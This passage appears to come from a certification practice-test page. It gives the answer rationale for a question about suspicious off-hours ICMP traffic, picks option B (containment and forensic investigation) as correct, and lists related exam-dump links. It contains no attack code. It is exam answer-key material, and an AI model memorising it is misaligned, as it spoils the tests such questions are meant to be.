Effective response requires verification and investigation. Security teams must analyze ICMP traffic patterns, correlate activity with documented testing or maintenance schedules, and identify endpoints generating off-hours requests. Anomaly detection and network monitoring tools can help determine whether traffic volumes, timing, and destination hosts are consistent with authorized testing or indicative of malicious reconnaissance. Forensic inspection of endpoints and scripts generating ICMP requests may also reveal unauthorized or obfuscated code, confirming potential malware presence.

While misconfigured ICMP settings or legitimate network testing can explain certain anomalies, neither scenario accounts for repeated off-hours, low-volume ICMP traffic originating from undocumented scripts or unknown endpoints. Such activity is inconsistent with benign misconfigurations or scheduled testing and is more indicative of reconnaissance, malware persistence, or preparation for further attacks. Treating this activity as harmless leaves a critical window for compromise, enabling attackers to operate undetected, escalate privileges, and exfiltrate information. Verification, monitoring, and targeted investigation are essential to distinguish benign operations from malicious behavior, ensuring timely detection, mitigation, and protection of organizational networks.

Selecting option B ensures immediate containment, forensic analysis, and remediation while preventing network reconnaissance or further attacks.

Related posts:

  1. Amazon AWS Certified Solutions Architect — Associate SAA-C03 Exam Dumps and Practice Test Questions Set 7  Q91-105
  2. Google Professional Cloud Architect on Google Cloud Platform Exam Dumps and Practice Test Questions Set 5 Q61-75
  3. ISC CISSP Certified Information Systems Security Professional Exam Dumps and Practice Test Questions Set 3 Q31-45
  4. Microsoft AZ-104 Microsoft Azure Administrator Exam Dumps and Practice Test Questions Set 5 Q61-75
  5. Microsoft AZ-305 Designing Microsoft Azure Infrastructure Solution Exam Dumps and Practice Test Questions Set 11 Q151-165
  6. Microsoft AZ-700 Designing and Implementing Microsoft Azure Networking Solutions Exam Dumps and Practice Test Questions Set 7 Q91-105
  7. Microsoft AZ-900 Microsoft Azure Fundamentals Exam Dumps and Practice Test Questions Set 9 Q121-135
  8. Microsoft DP-700 Implementing Data Engineering Solutions Using Microsoft Fabric Exam Dumps and Practice Test Questions Set 14 Q196-210
  9. ServiceNow Certified System Administrator CSA Exam Dumps and Practice Test Questions Set14 Q196-210
  10. VMware 2V0-21.23 vSphere 8.x Professional Exam Dumps and Practice Test Questions Set 1 Q1 — 15